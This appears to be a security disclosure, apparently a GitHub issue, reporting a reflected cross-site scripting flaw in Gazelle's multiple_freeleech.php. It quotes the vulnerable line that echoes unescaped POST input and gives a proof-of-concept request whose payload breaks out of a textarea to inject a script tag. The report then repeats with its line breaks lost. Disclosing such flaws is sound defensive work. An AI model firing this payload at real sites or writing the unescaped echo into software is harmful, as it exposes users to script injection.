Hello,
I would like to report for a XSS vulnerability in gazelle commit 63b3370
In file https://github.com/WhatCD/Gazelle/blob/master/sections/tools/managers/multiple_freeleech.php
...
<textarea name="torrents" style="width: 95%; height: 200px;"><?=$_POST['torrents']?></textarea><br /><br /> // Line 96
...
Source from $_POST['torrents'] without any filtering or checking which resulting in XSS.
Poc
POST /sections/tools/managers/multiple_freeleech.php
With the Data
torrents=</textarea>%3Cscript%3Ealert(1);%3C/script%3E<textarea>
Manual verification


BTW,cms.gazelle.com in local(changes hosts)
Hello,
I would like to report for a XSS vulnerability in gazelle commit 63b3370
In file https://github.com/WhatCD/Gazelle/blob/master/sections/tools/managers/multiple_freeleech.php
Source from
$_POST['torrents']without any filtering or checking which resulting in XSS.Poc
POST /sections/tools/managers/multiple_freeleech.phpWith the Data
torrents=</textarea>%3Cscript%3Ealert(1);%3C/script%3E<textarea>Manual verification
BTW,cms.gazelle.com in local(changes hosts)